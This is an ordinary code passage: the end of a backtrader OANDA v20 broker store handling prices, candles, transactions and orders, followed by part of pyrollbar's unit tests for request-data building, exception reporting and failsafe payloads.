msg_type == "transaction.Transaction": self._transaction(msg.dict()) except Exception as e: self.put_notification(e) def _t_streaming_prices(self, dataname, q, tmout): '''Callback method for streaming prices''' if tmout is not None: _time.sleep(tmout) try: response = self.oapi_stream.pricing.stream( self.p.account, instruments=dataname, ) for msg_type, msg in response.parts(): # FIXME not sure, why the type is either Price or ClientPrice # https://github.com/ftomassetti/backtrader-oandav20/issues/26 # there was already a suggestion to change this, but both # msg_types return the price. Check for both msg_types (Price, ClientPrice) # to fetch all streamed prices. if msg_type in ["pricing.Price", "pricing.ClientPrice"]: # put price into queue as dict q.put(msg.dict()) except Exception as e: self.put_notification(e) def _t_account(self): '''Callback method for account request''' while True: try: msg = self.q_account.get(timeout=self.p.account_poll_freq) if msg is None: break # end of thread except queue.Empty: # tmout -> time to refresh pass try: response = self.oapi.account.summary(self.p.account) accinfo = response.get('account', 200) except Exception as e: self.put_notification(e) print(e, response.get('errorMessage')) continue try: self._cash = accinfo.marginAvailable self._value = accinfo.balance self._currency = accinfo.currency except KeyError: pass # notify of success, initialization waits for it self._evt_acct.set() def _t_candles(self, dataname, dtbegin, dtend, timeframe, compression, candleFormat, includeFirst, onlyComplete, q): '''Callback method for candles request''' granularity = self.get_granularity(timeframe, compression) if granularity is None: q.put(None) return dtkwargs = {} if dtbegin is not None: dtkwargs['fromTime'] = dtbegin.strftime("%Y-%m-%dT%H:%M:%S.000000000Z") dtkwargs['includeFirst'] = includeFirst count = 0 while True: count += 1 if count > 1: dtkwargs['includeFirst'] = False try: response = self.oapi.instrument.candles(dataname, granularity=granularity, price=candleFormat, **dtkwargs) candles = response.get('candles', 200) except Exception as e: self.put_notification(e) print(e, response.get('errorMessage')) return dtobj = None for candle in candles: # get current candle time dtobj = datetime.utcfromtimestamp(float(candle.time)) # if end time is provided, check if time is reached for every candle if dtend is not None and dtobj > dtend: break # add candle if not onlyComplete or candle.complete: q.put(candle.dict()) if dtobj is not None: dtkwargs['fromTime'] = dtobj.strftime("%Y-%m-%dT%H:%M:%S.000000000Z") elif dtobj is None: break if dtend is not None and dtobj > dtend: break if len(candles) == 0: break q.put({}) # end of transmission''' # transactions which will be emitted on creating/accepting a order _X_CREATE_TRANS = ['MARKET_ORDER', 'LIMIT_ORDER', 'STOP_ORDER', 'TAKE_PROFIT_ORDER', 'STOP_LOSS_ORDER',] # transactions which filled orders _X_FILL_TRANS = ['ORDER_FILL',] # transactions which cancelled orders _X_CANCEL_TRANS = ['ORDER_CANCEL',] # transactions which were rejected _X_REJECT_TRANS = ['MARKET_ORDER_REJECT', 'LIMIT_ORDER_REJECT', 'STOP_ORDER_REJECT', 'TAKE_PROFIT_ORDER_REJECT', 'STOP_LOSS_ORDER_REJECT',] # transactions which can be ignored _X_IGNORE_TRANS = ['DAILY_FINANCING', 'CLIENT_CONFIGURE'] def _transaction(self, trans): oid = None ttype = trans['type'] if ttype in self._X_CREATE_TRANS: # get order id (matches transaction id) oid = trans['id'] oref = None # identify backtrader order by checking client extensions (this is used when creating a order) if 'clientExtensions' in trans: # assume backtrader created the order for this transaction oref = int(trans['clientExtensions']['id']) if oref is not None: self._orders[oid] = oref elif ttype in self._X_FILL_TRANS: # order was filled, notify backtrader of it oid = trans['orderID'] elif ttype in self._X_CANCEL_TRANS: # order was cancelled, notify backtrader of it oid = trans['orderID'] elif ttype in self._X_REJECT_TRANS: # transaction was rejected, notify backtrader of it oid = trans['requestID'] elif ttype in self._X_IGNORE_TRANS: # transaction can be ignored msg = 'Received transaction {} with id {}. Ignoring transaction.' msg = msg.format(ttype, trans['id']) self.put_notification(msg, trans) else: msg = 'Received transaction {} with id {}. Unknown situation.' msg = msg.format(ttype, trans['id']) self.put_notification(msg, trans) return if oid in self._orders: # when an order id exists process transaction self._process_transaction(oid, trans) else: # external order created this transaction if self.broker.p.use_positions and ttype in self._X_FILL_TRANS: size = float(trans['units']) price = float(trans['price']) for data in self.datas: if data._name == trans['instrument']: self.broker._fill_external(data, size, price) break elif ttype not in self._X_IGNORE_TRANS: # notify about unknown transaction if self.broker.p.use_positions: msg = 'Received external transaction {} with id {}. Skipping transaction.' else: msg = 'Received external transaction {} with id {}. Positions and trades may not match anymore.' msg = msg.format(ttype, trans['id']) self.put_notification(msg, trans) def _process_transaction(self, oid, trans): try: # get a reference to a backtrader order based on the order id / trade id oref = self._orders[oid] except KeyError: return ttype = trans['type'] if ttype in self._X_CREATE_TRANS: self.broker._accept(oref) elif ttype in self._X_FILL_TRANS: size = float(trans['units']) price = float(trans['price']) self.broker._fill(oref, size, price, reason=trans['reason']) # store trade ids which were touched by the order if 'tradeOpened' in trans: self._orders[trans['tradeOpened']['tradeID']] = oref if 'tradeReduced' in trans: self._orders[trans['tradeReduced']['tradeID']] = oref elif ttype in self._X_CANCEL_TRANS: reason = trans['reason'] if reason == 'TIME_IN_FORCE_EXPIRED': self.broker._expire(oref) else: self.broker._cancel(oref) elif ttype in self._X_REJECT_TRANS: self.broker._reject(oref) def _t_order_create(self): while True: msg = self.q_ordercreate.get() if msg is None: break oref, okwargs = msg try: response = self.oapi.order.create(self.p.account, order=okwargs) # get the transaction which created the order o = response.get("orderCreateTransaction", 201) except Exception as e: self.put_notification(e) self.broker._reject(oref) continue def _t_order_cancel(self): while True: oref = self.q_orderclose.get() if oref is None: break oid = self._orders.get(oref, None) if oid is None: continue # the order is no longer there try: # TODO either close pending orders or filled trades response = self.oapi.trade.close(self.p.account, oid) except Exception as e: self.put_notification(e) continue self.broker._cancel(oref)
test_rollbar.py
import base64 import copy import json import socket import threading import uuid import sys try: from StringIO import StringIO except ImportError: from io import StringIO try: from unittest import mock except ImportError: import mock import unittest import rollbar from rollbar.lib import python_major_version, string_types from rollbar.test import BaseTest try: eval(""" def _anonymous_tuple_func(x, (a, b), y): ret = x + a + b + y breakme() return ret """) except SyntaxError: _anonymous_tuple_func = None _test_access_token = 'aaaabbbbccccddddeeeeffff00001111' _default_settings = copy.deepcopy(rollbar.SETTINGS) class RollbarTest(BaseTest): def setUp(self): rollbar._initialized = False rollbar.SETTINGS = copy.deepcopy(_default_settings) rollbar.init(_test_access_token, locals={'enabled': True}, dummy_key='asdf', handler='blocking', timeout=12345) def test_merged_settings(self): expected = {'enabled': True, 'sizes': rollbar.DEFAULT_LOCALS_SIZES, 'safe_repr': True, 'scrub_varargs': True, 'safelisted_types': [], 'whitelisted_types': []} self.assertDictEqual(rollbar.SETTINGS['locals'], expected) self.assertEqual(rollbar.SETTINGS['timeout'], 12345) self.assertEqual(rollbar.SETTINGS['dummy_key'], 'asdf') def test_default_configuration(self): self.assertEqual(rollbar.SETTINGS['access_token'], _test_access_token) self.assertEqual(rollbar.SETTINGS['environment'], 'production') @mock.patch('rollbar.send_payload') def test_disabled(self, send_payload): rollbar.SETTINGS['enabled'] = False rollbar.report_message('foo') try: raise Exception('foo') except: rollbar.report_exc_info() self.assertEqual(send_payload.called, False) def test_server_data(self): server_data = rollbar._build_server_data() self.assertIn('host', server_data) self.assertIn('argv', server_data) self.assertNotIn('branch', server_data) self.assertNotIn('root', server_data) rollbar.SETTINGS['branch'] = 'master' rollbar.SETTINGS['root'] = '/home/test/' server_data = rollbar._build_server_data() self.assertIn('host', server_data) self.assertIn('argv', server_data) self.assertEqual(server_data['branch'], 'master') self.assertEqual(server_data['root'], '/home/test/') def test_wsgi_request_data(self): request = { 'CONTENT_LENGTH': str(len('body body body')), 'CONTENT_TYPE': '', 'DOCUMENT_URI': '/api/test', 'GATEWAY_INTERFACE': 'CGI/1.1', 'HTTP_CONNECTION': 'close', 'HTTP_HOST': 'example.com', 'HTTP_USER_AGENT': 'Agent', 'PATH_INFO': '/api/test', 'QUERY_STRING': 'format=json&param1=value1&param2=value2', 'REMOTE_ADDR': '127.0.0.1', 'REQUEST_METHOD': 'GET', 'SCRIPT_NAME': '', 'SERVER_ADDR': '127.0.0.1', 'SERVER_NAME': 'example.com', 'SERVER_PORT': '80', 'SERVER_PROTOCOL': 'HTTP/1.1', 'wsgi.input': StringIO('body body body'), 'wsgi.multiprocess': True, 'wsgi.multithread': False, 'wsgi.run_once': False, 'wsgi.url_scheme': 'http', 'wsgi.version': (1, 0) } data = rollbar._build_wsgi_request_data(request) self.assertEqual(data['url'], 'http://example.com/api/test?format=json&param1=value1&param2=value2') self.assertEqual(data['user_ip'], '127.0.0.1') self.assertEqual(data['method'], 'GET') self.assertEqual(data['body'], 'body body body') self.assertDictEqual(data['GET'], {'format': 'json', 'param1': 'value1', 'param2': 'value2'}) self.assertDictEqual(data['headers'], {'Connection': 'close', 'Host': 'example.com', 'User-Agent': 'Agent'}) def test_starlette_request_data(self): try: from starlette.requests import Request except ImportError: self.skipTest('Requires Starlette to be installed') scope = { 'type': 'http', 'client': ('127.0.0.1', 1453), 'headers': [ (b'accept', b'*/*'), (b'content-type', b'application/x-www-form-urlencoded'), (b'host', b'example.com'), (b'user-agent', b'Agent'), ], 'http_version': '1.1', 'method': 'GET', 'path': '/api/test', 'path_params': {'param': 'test'}, 'query_params': { 'format': 'json', 'param1': 'value1', 'param2': 'value2', }, 'query_string': b'format=json&param1=value1&param2=value2', 'scheme': 'http', 'server': ('example.com', 80), 'url': {'path': 'example.com'}, } request = Request(scope) data = rollbar._build_starlette_request_data(request) self.assertEqual(data['url'], 'http://example.com/api/test?format=json&param1=value1&param2=value2') self.assertEqual(data['user_ip'], '127.0.0.1') self.assertEqual(data['method'], 'GET') self.assertDictEqual(data['params'], {'param': 'test'}) self.assertDictEqual(data['GET'], {'format': 'json', 'param1': 'value1', 'param2': 'value2'}) self.assertDictEqual( data['headers'], { 'accept': '*/*', 'content-type': 'application/x-www-form-urlencoded', 'host': 'example.com', 'user-agent': 'Agent', }, ) def test_starlette_request_data_with_consumed_body(self): try: from starlette.requests import Request except ImportError: self.skipTest('Requires Starlette to be installed') from rollbar.lib._async import async_receive, run rollbar.SETTINGS['include_request_body'] = True body = b'body body body' scope = { 'type': 'http', 'headers': [ (b'content-type', b'text/html'), (b'content-length', str(len(body)).encode('latin-1')), ], 'method': 'GET', 'path': '/api/test', 'query_string': b'', } receive = async_receive( {'type': 'http.request', 'body': body, 'mode_body': False} ) request = Request(scope, receive) # Consuming body in Starlette middleware is currently disabled run(request.body()) # await request.body() data = rollbar._build_starlette_request_data(request) self.assertEqual(data['body'], body.decode('latin-1')) def test_starlette_request_data_empty_values(self): try: from starlette.requests import Request except ImportError: self.skipTest('Requires Starlette to be installed') scope = { 'type': 'http', 'client': ('127.0.0.1', 1453), 'headers': [ (b'content-type', b'text/html'), ], 'method': 'GET', 'query_string': b'', 'path': '', } request = Request(scope) data = rollbar._build_starlette_request_data(request) self.assertFalse('GET' in data) self.assertFalse('url' in data) self.assertFalse('params' in data) self.assertTrue('headers' in data) self.assertEqual(data['user_ip'], scope['client'][0]) self.assertEqual(data['method'], scope['method']) def test_fastapi_request_data(self): try: from fastapi.requests import Request except ImportError: self.skipTest('Requires FastAPI to be installed') scope = { 'type': 'http', 'client': ('127.0.0.1', 1453), 'headers': [ (b'accept', b'*/*'), (b'content-type', b'application/x-www-form-urlencoded'), (b'host', b'example.com'), (b'user-agent', b'Agent'), ], 'http_version': '1.1', 'method': 'GET', 'path': '/api/test', 'path_params': {'param': 'test'}, 'query_params': { 'format': 'json', 'param1': 'value1', 'param2': 'value2', }, 'query_string': b'format=json&param1=value1&param2=value2', 'scheme': 'http', 'server': ('example.com', 80), 'url': {'path': 'example.com'}, } request = Request(scope) data = rollbar._build_fastapi_request_data(request) self.assertEqual(data['url'], 'http://example.com/api/test?format=json&param1=value1&param2=value2') self.assertEqual(data['user_ip'], '127.0.0.1') self.assertEqual(data['method'], 'GET') self.assertDictEqual(data['params'], {'param': 'test'}) self.assertDictEqual(data['GET'], {'format': 'json', 'param1': 'value1', 'param2': 'value2'}) self.assertDictEqual( data['headers'], { 'accept': '*/*', 'content-type': 'application/x-www-form-urlencoded', 'host': 'example.com', 'user-agent': 'Agent', }, ) def test_fastapi_request_data_with_consumed_body(self): try: from fastapi import Request except ImportError: self.skipTest('Requires FastAPI to be installed') from rollbar.lib._async import async_receive, run rollbar.SETTINGS['include_request_body'] = True body = b'body body body' scope = { 'type': 'http', 'headers': [ (b'content-type', b'text/html'), (b'content-length', str(len(body)).encode('latin-1')), ], 'method': 'GET', 'path': '/api/test', 'query_string': b'', } receive = async_receive( {'type': 'http.request', 'body': body, 'mode_body': False} ) request = Request(scope, receive) # Consuming body in FastAPI middlewares is currently disabled run(request.body()) # await request.body() data = rollbar._build_fastapi_request_data(request) self.assertEqual(data['body'], body.decode('latin-1')) def test_fastapi_request_data_empty_values(self): try: from fastapi import Request except ImportError: self.skipTest('Requires FastAPI to be installed') scope = { 'type': 'http', 'client': ('127.0.0.1', 1453), 'headers': [ (b'content-type', b'text/html'), ], 'method': 'GET', 'query_string': b'', 'path': '', } request = Request(scope) data = rollbar._build_fastapi_request_data(request) self.assertFalse('GET' in data) self.assertFalse('url' in data) self.assertFalse('params' in data) self.assertTrue('headers' in data) self.assertEqual(data['user_ip'], scope['client'][0]) self.assertEqual(data['method'], scope['method']) @unittest.skipUnless(sys.version_info >= (3, 6), 'Python3.6+ required') def test_get_request_starlette_middleware(self): try: from starlette.applications import Starlette from starlette.middleware import Middleware from starlette.responses import PlainTextResponse from starlette.routing import Route from starlette.testclient import TestClient except ImportError: self.skipTest('Requires Starlette package') from rollbar.contrib.starlette import ReporterMiddleware def root(starlette_request): current_request = rollbar.get_request() self.assertEqual(current_request, starlette_request) return PlainTextResponse("bye bye") routes = [Route('/{param}', root)] middleware = [Middleware(ReporterMiddleware)] app = Starlette(routes=routes, middleware=middleware) client = TestClient(app) response = client.get('/test?param1=value1&param2=value2') self.assertEqual(response.status_code, 200) @unittest.skipUnless(sys.version_info >= (3, 6), 'Python3.6+ required') def test_get_request_starlette_logger(self): try: from starlette.applications import Starlette from starlette.middleware import Middleware from starlette.responses import PlainTextResponse from starlette.routing import Route from starlette.testclient import TestClient except ImportError: self.skipTest('Requires Starlette package') from rollbar.contrib.starlette import ReporterMiddleware def root(starlette_request): current_request = rollbar.get_request() self.assertEqual(current_request, starlette_request) return PlainTextResponse("bye bye") routes = [Route('/{param}', root)] middleware = [Middleware(ReporterMiddleware)] app = Starlette(routes=routes, middleware=middleware) client = TestClient(app) response = client.get('/test?param1=value1&param2=value2') self.assertEqual(response.status_code, 200) @unittest.skipUnless(sys.version_info >= (3, 6), 'Python3.6+ required') def test_get_request_fastapi_middleware(self): try: from fastapi import FastAPI, Request from fastapi.testclient import TestClient except ImportError: self.skipTest('Requires FastaAPI package') from rollbar.contrib.fastapi import ReporterMiddleware app = FastAPI() app.add_middleware(ReporterMiddleware) # Inject annotations and decorate endpoint dynamically # to avoid SyntaxError for older Python # # This is the code we'd use if we had not loaded the test file on Python 2. # # @app.get('/{param}') # def root(param, fastapi_request: Request): # current_request = rollbar.get_request() # # self.assertEqual(current_request, fastapi_request) def root(param, fastapi_request): current_request = rollbar.get_request() self.assertEqual(current_request, fastapi_request) root = fastapi_add_route_with_request_param( app, root, '/{param}', 'fastapi_request' ) client = TestClient(app) response = client.get('/test?param1=value1&param2=value2') self.assertEqual(response.status_code, 200) @unittest.skipUnless(sys.version_info >= (3, 6), 'Python3.6+ required') def test_get_request_fastapi_logger(self): try: from fastapi import FastAPI, Request from fastapi.testclient import TestClient except ImportError: self.skipTest('Requires FastaAPI package') from rollbar.contrib.fastapi import ReporterMiddleware app = FastAPI() app.add_middleware(ReporterMiddleware) # Inject annotations and decorate endpoint dynamically # to avoid SyntaxError for older Python # # This is the code we'd use if we had not loaded the test file on Python 2. # # @app.get('/{param}') # def root(fastapi_request: Request): # current_request = rollbar.get_request() # # self.assertEqual(current_request, fastapi_request) def root(param, fastapi_request): current_request = rollbar.get_request() self.assertEqual(current_request, fastapi_request) root = fastapi_add_route_with_request_param( app, root, '/{param}', 'fastapi_request' ) client = TestClient(app) response = client.get('/test?param1=value1&param2=value2') self.assertEqual(response.status_code, 200) @unittest.skipUnless(sys.version_info >= (3, 6), 'Python3.6+ required') def test_get_request_fastapi_router(self): try: import fastapi from fastapi import FastAPI, Request from fastapi.testclient import TestClient except ImportError: self.skipTest('Requires FastAPI package') from rollbar.contrib.fastapi import add_to as rollbar_add_to if fastapi.__version__ < '0.41.0': self.skipTest('Requires FastAPI 0.41.0+') app = FastAPI() rollbar_add_to(app) # Inject annotations and decorate endpoint dynamically # to avoid SyntaxError for older Python # # This is the code we'd use if we had not loaded the test file on Python 2. # # @app.get('/{param}') # def root(fastapi_request: Request): # current_request = rollbar.get_request() # # self.assertEqual(current_request, fastapi_request) def root(param, fastapi_request): current_request = rollbar.get_request() self.assertEqual(current_request, fastapi_request) root = fastapi_add_route_with_request_param( app, root, '/{param}', 'fastapi_request' ) client = TestClient(app) response = client.get('/test?param1=value1&param2=value2') self.assertEqual(response.status_code, 200) @mock.patch('rollbar.send_payload') def test_report_exception(self, send_payload): def _raise(): try: raise Exception('foo') except: rollbar.report_exc_info() _raise() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual(payload['access_token'], _test_access_token) self.assertIn('body', payload['data']) self.assertIn('trace', payload['data']['body']) self.assertNotIn('trace_chain', payload['data']['body']) self.assertIn('exception', payload['data']['body']['trace']) self.assertEqual(payload['data']['body']['trace']['exception']['message'], 'foo') self.assertEqual(payload['data']['body']['trace']['exception']['class'], 'Exception') self.assertNotIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('locals', payload['data']['body']['trace']['frames'][-1]) @mock.patch('rollbar._post_api') def test_lambda_function_good(self, _post_api): rollbar.SETTINGS['handler'] = 'thread' fake_event = {'a': 42} fake_context = MockLambdaContext(99) @rollbar.lambda_function def my_lambda_func(event, context): return [event['a'], context.x] result = my_lambda_func(fake_event, fake_context) self.assertEqual(len(result), 2) self.assertEqual(result[0], 42) self.assertEqual(result[1], 99) self.assertEqual(_post_api.called, False) rollbar._CURRENT_LAMBDA_CONTEXT = None rollbar.SETTINGS['handler'] = 'blocking' @mock.patch('rollbar._post_api') def test_lambda_function_bad(self, _post_api): rollbar.SETTINGS['handler'] = 'thread' fake_event = {'a': 42} fake_context = MockLambdaContext(99) @rollbar.lambda_function def my_lambda_func(event, context): raise event['a'] result = None try: result = my_lambda_func(fake_event, fake_context) except: pass self.assertEqual(result, None) self.assertEqual(_post_api.called, True) rollbar._CURRENT_LAMBDA_CONTEXT = None rollbar.SETTINGS['handler'] = 'blocking' @mock.patch('rollbar._post_api') def test_lambda_function_method_good(self, _post_api): rollbar.SETTINGS['handler'] = 'thread' fake_event = {'a': 42} fake_context = MockLambdaContext(99) class LambdaClass(object): def __init__(self): self.a = 13 def my_lambda_func(self, event, context): return [event['a'], context.x, self.a] app = LambdaClass() app.my_lambda_func = rollbar.lambda_function(app.my_lambda_func) result = app.my_lambda_func(fake_event, fake_context) self.assertEqual(len(result), 3) self.assertEqual(result[0], 42) self.assertEqual(result[1], 99) self.assertEqual(result[2], 13) self.assertEqual(_post_api.called, False) rollbar._CURRENT_LAMBDA_CONTEXT = None rollbar.SETTINGS['handler'] = 'blocking' @mock.patch('rollbar._post_api') def test_lambda_function_method_bad(self, _post_api): rollbar.SETTINGS['handler'] = 'thread' fake_event = {'a': 42} fake_context = MockLambdaContext(99) class LambdaClass(object): def __init__(self): self.a = 13 def my_lambda_func(self, event, context): raise self.a app = LambdaClass() app.my_lambda_func = rollbar.lambda_function(app.my_lambda_func) result = None try: result = app.my_lambda_func(fake_event, fake_context) except: pass self.assertEqual(result, None) self.assertEqual(_post_api.called, True) rollbar._CURRENT_LAMBDA_CONTEXT = None rollbar.SETTINGS['handler'] = 'blocking' @mock.patch('rollbar.send_payload') def test_report_exception_with_cause(self, send_payload): def _raise_cause(): bar_local = 'bar' raise CauseException('bar') def _raise_ex(): try: _raise_cause() except CauseException as cause: # python2 won't automatically assign this traceback... exc_info = sys.exc_info() setattr(cause, '__traceback__', exc_info[2]) try: foo_local = 'foo' # in python3 this would normally be expressed as # raise Exception('foo') from cause e = Exception('foo') setattr(e, '__cause__', cause) # PEP-3134 raise e except: rollbar.report_exc_info() _raise_ex() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual(payload['access_token'], _test_access_token) self.assertIn('body', payload['data']) self.assertNotIn('trace', payload['data']['body']) self.assertIn('trace_chain', payload['data']['body']) self.assertEqual(2, len(payload['data']['body']['trace_chain'])) self.assertIn('exception', payload['data']['body']['trace_chain'][0]) self.assertEqual(payload['data']['body']['trace_chain'][0]['exception']['message'], 'foo') self.assertEqual(payload['data']['body']['trace_chain'][0]['exception']['class'], 'Exception') self.assertEqual(payload['data']['body']['trace_chain'][0]['frames'][-1]['locals']['foo_local'], 'foo') self.assertIn('exception', payload['data']['body']['trace_chain'][1]) self.assertEqual(payload['data']['body']['trace_chain'][1]['exception']['message'], 'bar') self.assertEqual(payload['data']['body']['trace_chain'][1]['exception']['class'], 'CauseException') self.assertEqual(payload['data']['body']['trace_chain'][1]['frames'][-1]['locals']['bar_local'], 'bar') @mock.patch('rollbar.send_payload') def test_report_exception_with_same_exception_as_cause(self, send_payload): cause_exc = CauseException('bar') def _raise_cause(): bar_local = 'bar' raise cause_exc def _raise_ex(): try: _raise_cause() except CauseException as cause: # python2 won't automatically assign this traceback... exc_info = sys.exc_info() setattr(cause, '__traceback__', exc_info[2]) try: foo_local = 'foo' # in python3 this would normally be expressed as # raise cause from cause setattr(cause, '__cause__', cause) # PEP-3134 raise cause except: rollbar.report_exc_info() ex_raiser = threading.Thread(target=_raise_ex) ex_raiser.daemon = True ex_raiser.start() # 0.5 seconds ought be enough for any modern computer to get into the # cyclical parts of the code, but not so long as to collect a lot of # objects in memory ex_raiser.join(timeout=0.5) if ex_raiser.is_alive(): # This breaks the circular reference, allowing thread to exit and # to be joined cause_exc.__cause__ = None ex_raiser.join() self.fail('Cyclic reference in rollbar._walk_trace_chain()') self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual(payload['access_token'], _test_access_token) self.assertIn('body', payload['data']) self.assertNotIn('trace', payload['data']['body']) self.assertIn('trace_chain', payload['data']['body']) self.assertEqual(2, len(payload['data']['body']['trace_chain'])) self.assertIn('exception', payload['data']['body']['trace_chain'][0]) self.assertEqual(payload['data']['body']['trace_chain'][0]['exception']['message'], 'bar') self.assertEqual(payload['data']['body']['trace_chain'][0]['exception']['class'], 'CauseException') frames = payload['data']['body']['trace_chain'][0]['frames'] self.assertEqual(payload['data']['body']['trace_chain'][0]['frames'][0]['locals']['foo_local'], 'foo') self.assertIn('exception', payload['data']['body']['trace_chain'][1]) self.assertEqual(payload['data']['body']['trace_chain'][1]['exception']['message'], 'bar') self.assertEqual(payload['data']['body']['trace_chain'][1]['exception']['class'], 'CauseException') self.assertEqual(payload['data']['body']['trace_chain'][1]['frames'][-1]['locals']['bar_local'], 'bar') @mock.patch('rollbar.send_payload') def test_report_exception_with_context(self, send_payload): def _raise_context(): bar_local = 'bar' raise CauseException('bar') def _raise_ex(): try: _raise_context() except CauseException as context: # python2 won't automatically assign this traceback... exc_info = sys.exc_info() setattr(context, '__traceback__', exc_info[2]) try: foo_local = 'foo' # in python3 __context__ is automatically set when an exception is raised in an except block e = Exception('foo') setattr(e, '__context__', context) # PEP-3134 raise e except: rollbar.report_exc_info() _raise_ex() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual(payload['access_token'], _test_access_token) self.assertIn('body', payload['data']) self.assertNotIn('trace', payload['data']['body']) self.assertIn('trace_chain', payload['data']['body']) self.assertEqual(2, len(payload['data']['body']['trace_chain'])) self.assertIn('exception', payload['data']['body']['trace_chain'][0]) self.assertEqual(payload['data']['body']['trace_chain'][0]['exception']['message'], 'foo') self.assertEqual(payload['data']['body']['trace_chain'][0]['exception']['class'], 'Exception') self.assertEqual(payload['data']['body']['trace_chain'][0]['frames'][-1]['locals']['foo_local'], 'foo') self.assertIn('exception', payload['data']['body']['trace_chain'][1]) self.assertEqual(payload['data']['body']['trace_chain'][1]['exception']['message'], 'bar') self.assertEqual(payload['data']['body']['trace_chain'][1]['exception']['class'], 'CauseException') self.assertEqual(payload['data']['body']['trace_chain'][1]['frames'][-1]['locals']['bar_local'], 'bar') @mock.patch('rollbar.send_payload') def test_exception_filters(self, send_payload): rollbar.SETTINGS['exception_level_filters'] = [ (OSError, 'ignored'), ('rollbar.ApiException', 'ignored'), ('bogus.DoesntExist', 'ignored'), ] def _raise_exception(): try: raise Exception('foo') except: rollbar.report_exc_info() def _raise_os_error(): try: raise OSError('bar') except: rollbar.report_exc_info() def _raise_api_exception(): try: raise rollbar.ApiException('bar') except: rollbar.report_exc_info() _raise_exception() self.assertTrue(send_payload.called) _raise_os_error() self.assertEqual(1, send_payload.call_count) _raise_api_exception() self.assertEqual(1, send_payload.call_count) @mock.patch('rollbar.send_payload') def test_report_messsage(self, send_payload): rollbar.report_message('foo') self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual(payload['access_token'], _test_access_token) self.assertIn('body', payload['data']) self.assertIn('message', payload['data']['body']) self.assertIn('body', payload['data']['body']['message']) self.assertEqual(payload['data']['body']['message']['body'], 'foo') @mock.patch('rollbar.send_payload') def test_uuid(self, send_payload): uuid = rollbar.report_message('foo') payload = send_payload.call_args[0][0] self.assertEqual(payload['data']['uuid'], uuid) @mock.patch('rollbar.send_payload') def test_report_exc_info_level(self, send_payload): try: raise Exception('level_error') except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual(payload['data']['level'], 'error') try: raise Exception('level_info') except: rollbar.report_exc_info(level='info') self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual(payload['data']['level'], 'info') # payload takes precendence over 'level' try: raise Exception('payload_warn') except: rollbar.report_exc_info(level='info', payload_data={'level': 'warn'}) self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual(payload['data']['level'], 'warn') @mock.patch('rollbar.send_payload') def test_report_exc_info_nones(self, send_payload): rollbar.report_exc_info(exc_info=(None, None, None)) self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertEqual(payload['data']['level'], 'error') @mock.patch('rollbar._send_failsafe') @mock.patch('rollbar.lib.transport.post', side_effect=lambda *args, **kw: MockResponse({'status': 'Payload Too Large'}, 413)) def test_trigger_failsafe(self, post, _send_failsafe): rollbar.report_message('derp') self.assertEqual(_send_failsafe.call_count, 1) try: raise Exception('trigger_failsafe') except: rollbar.report_exc_info() self.assertEqual(_send_failsafe.call_count, 2) @mock.patch('rollbar._send_failsafe') @mock.patch('rollbar.lib.transport.post', side_effect=lambda *args, **kw: MockRawResponse('<html>\r\n' \ '<head><title>502 Bad Gateway</title></head>\r\n' \ '<body bgcolor="white">\r\n' \ '<center><h1>502 Bad Gateway</h1></center>\r\n' \ '<hr><center>nginx</center>\r\n' \ '</body>\r\n' \ '</html>\r\n', 502)) def test_502_failsafe(self, post, _send_failsafe): rollbar.report_message('derp') # self.assertEqual(_send_failsafe.call_count, 1) try: raise Exception('trigger_failsafe') except: rollbar._post_api('/api/1/item', {'derp'}) @mock.patch('rollbar.send_payload') def test_send_failsafe(self, send_payload): test_uuid = str(uuid.uuid4()) test_host = socket.gethostname() test_data = { 'access_token': _test_access_token, 'data': { 'body': { 'message': { 'body': 'Failsafe from pyrollbar: test message. ' 'Original payload may be found in your server ' 'logs by searching for the UUID.' } }, 'failsafe': True, 'level': 'error', 'custom': { 'orig_host': test_host, 'orig_uuid': test_uuid }, 'environment': rollbar.SETTINGS['environment'], 'internal': True, 'notifier': rollbar.SETTINGS['notifier'] } } rollbar._send_failsafe('test message', test_uuid, test_host) self.assertEqual(send_payload.call_count, 1) self.assertEqual(send_payload.call_args[0][0], test_data) @mock.patch('rollbar.log.exception') @mock.patch('rollbar.send_payload', side_effect=Exception('Monkey Business!')) def test_fail_to_send_failsafe(self, send_payload, mock_log): test_uuid = str(uuid.uuid4()) test_host = socket.gethostname() rollbar._send_failsafe('test message', test_uuid, test_host) self.assertEqual(mock_log.call_count, 1) @unittest.skipUnless(rollbar.AsyncHTTPClient, 'Requires async handler to be installed') @mock.patch('rollbar._send_payload_async') def test_async_handler(self, send_payload_async): def _raise(): try: raise Exception('foo') except: rollbar.report_exc_info() rollbar.SETTINGS['handler'] = 'async' _raise() send_payload_async.assert_called_once() @unittest.skipUnless(rollbar.httpx, 'Requires HTTPX to be installed') @mock.patch('rollbar._send_payload_httpx') def test_httpx_handler(self, send_payload_httpx): def _raise(): try: raise Exception('foo') except: rollbar.report_exc_info() rollbar.SETTINGS['handler'] = 'async' _raise() send_payload_httpx.assert_called_once() @mock.patch('rollbar.send_payload') def test_args_constructor(self, send_payload): class tmp(object): def __init__(self, arg1): self.arg1 = arg1 foo() try: t = tmp(33) except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) payload = send_payload.call_args[0][0] self.assertIn('argspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('varargspec', payload['data']['body']['trace']['frames'][-1]) self.assertNotIn('keywordspec', payload['data']['body']['trace']['frames'][-1]) self.assertEqual('arg1', payload['data']['body']['trace']['frames'][-1]['argspec'][1]) self.assertEqual(33, payload['data']['body']['trace']['frames'][-1]['locals']['arg1']) @mock.patch('rollbar.send_payload') def test_failed_locals_serialization(self, send_payload): class tmp(object): @property def __class__(self): foo() try: t = tmp() raise Exception('trigger_serialize') except: rollbar.report_exc_info() self.assertEqual(send_payload.called, True) 